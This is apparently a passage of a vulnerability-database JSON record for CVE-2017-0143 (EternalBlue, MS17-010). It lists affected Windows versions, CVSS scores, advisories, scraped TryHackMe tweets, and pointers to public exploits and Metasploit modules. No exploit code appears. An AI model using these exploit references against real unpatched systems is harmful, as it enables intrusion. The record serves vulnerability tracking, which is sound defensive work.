Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, 
{"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", 
"cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "96706", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96706"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": 
"http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148"}], "immutableFields": []}, {"id": "CVE-2017-0143", "bulletinFamily": "NVD", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "reporter": "secure@microsoft.com", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", 
"https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0143"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": 
"cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], 
"type": "openvas"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.2, "vector": "NONE"}, "twitter": {"counter": 57, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! 
Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", 
"tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96703", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96703"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "hash": "a9607c104a47576843cea504612b3f6584c0c42097544568f87ff433d6b9e987", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "73402198f736fb284b47cab17ac32650", "key": "description"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d62415554465cb42c2ec8c5b1a727c7d", "key": "extraReferences"}, {"hash": "1b0a551fb9c586414474d37717dc313a", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "f11fa97bbd952a3146ffbddd59276c1d", "key": "title"}, {"hash": "2f4290596ecc563b65873431415d8e8a", "key": 
"references"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "id": "CVE-2017-0143", "immutableFields": [], "lastseen": "2021-02-02T06:36:30", "modified": "2018-06-21T01:29:00", "objectVersion": "1.5", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96703", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0143", "type": "cve", "viewCount": 205}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:36:30"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, 
